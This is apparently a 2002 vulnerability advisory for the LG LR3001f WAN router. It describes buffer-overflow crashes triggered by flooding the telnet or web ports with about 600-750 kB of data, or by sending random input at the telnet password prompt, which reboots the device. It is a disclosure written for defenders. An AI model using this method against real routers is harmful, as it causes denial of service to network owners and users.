Issue: ----------------------------------------------------------------|
LG Electronics LR3001f is a WAN router. It comes with no access
lists defined, which enables administrator to connect both to
port 23/tcp (telnet) and 80/tcp (www server). However, IP stack of
LR3001f has several bugs, that can be exploited via network.
Description: ----------------------------------------------------------|
When configured without access lists protecting ports 23 or/and 80,
the LR3001f is vulnerable to at least two bugs, resulting from
memory allocation function buffer overflows.
First is exploitable without any access to user account at the
router. Only thing needed is access to port 23/tcp or 80/tcp. If
the router is attacked with data stream (can be any characters,
both randomized and text-only input was used during testing)
coming to one of the mentioned ports it will reboot, with one of
the following messages:
Router# [BUFFER] Unknown free 0xffffffff
Router# can't malloc
or
Router# [BUFFER] ERROR free not in use
Router# can't malloc
Measured values for lenght of the data stream were
approx. 750kB for 23/tcp and 600kB for 80/tcp.
Second bug is directly in the telnet service, when checking
passwords. The same technique with random data stream is used,
however few ENTER characters should be sent at first, to overcome
router primary prompt waiting for that key to be pressed. In this
case, router reboots with no message.
Vulnerable versions: --------------------------------------------------|
All software versions up to and including 4.0 are vulnerable to this
types of attack.
4.57 version downloadable from vendor website is vulnerable to second
type of attack, however is not vulnerable to first type of attack.
The vendor representative was informed about the vulnerabilities on
2002-04-18, and LG till that day has not released any new software
version.
Info on this advisory: ------------------------------------------------|
This advisory can be accessed on-line at my personal site:
http://mr0vka.eu.org/docs/advisories/lg-3100f-2002-04-18.html
or in plain-text:
http://mr0vka.eu.org/docs/advisories/lg-3100f-2002-04-18.txt
My personal GPG key fingerprint is located at following address:
http://mr0vka.eu.org/aboutme/index.html#pgp
Disclaimer: -----------------------------------------------------------|
None at this time.